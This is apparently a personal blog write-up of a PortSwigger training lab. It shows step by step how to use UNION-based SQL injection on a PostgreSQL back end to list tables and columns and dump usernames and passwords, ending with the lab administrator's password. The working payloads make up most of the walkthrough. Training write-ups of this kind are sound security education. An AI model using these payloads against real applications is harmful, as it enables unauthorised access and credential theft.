SQL injection attack, listing the database contents on non-Oracle databases | Dec 5, 2022
Introduction
Welcome to my another writeup! In this Portswigger Labs lab, you'll learn: SQL injection attack, listing the database contents on non-Oracle databases! Without further ado, let's dive in.
- Overall difficulty for me (From 1-10 stars): ★☆☆☆☆☆☆☆☆☆
Background
This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.
The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.
To solve the lab, log in as the administrator
user.
Exploitation
Home page:
In the previous labs, we found an SQL injection vulnerability in the product category filter:
And we found there are 2 columns in the current table, and both columns are accepting string data type.
To extract the username and password of all users, I'll:
- Find out which DBMS(Database Management System) and it's version:
' UNION SELECT NULL,version()-- -
- DBMS information: PostgreSQL version 12.12
Then we can list all the table names.
- List all the table names:
' UNION SELECT NULL,table_name FROM information_schema.tables-- -
That's way too many tables. Let's exclude all the pg
tables, which is the PostgreSQL default tables.
- Excluding
pg
tables:
' UNION SELECT NULL,table_name FROM information_schema.tables WHERE table_name NOT LIKE '%pg%'-- -
After some filtering, I found the users_zmlpng
table look sussy. Let's list all column names of this table.
- List all column names of table
users_zmlpng
:' UNION SELECT NULL,column_name FROM information_schema.columns WHERE table_name='users_zmlpng'-- -
It has 2 columns: username_hrympe
and password_gxucte
. Let's extract those data!
- Extracting table
users_zmlpng
data:
' UNION SELECT NULL,username_hrympe||':'||password_gxucte FROM users_zmlpng-- -
We found administrator
password!
- Username: administrator
- Password: 5eg7nhvdr5aag5h4n4i4
Let's login as administrator
!
We're user administrator
!!
What we've learned:
- SQL injection attack, listing the database contents on non-Oracle databases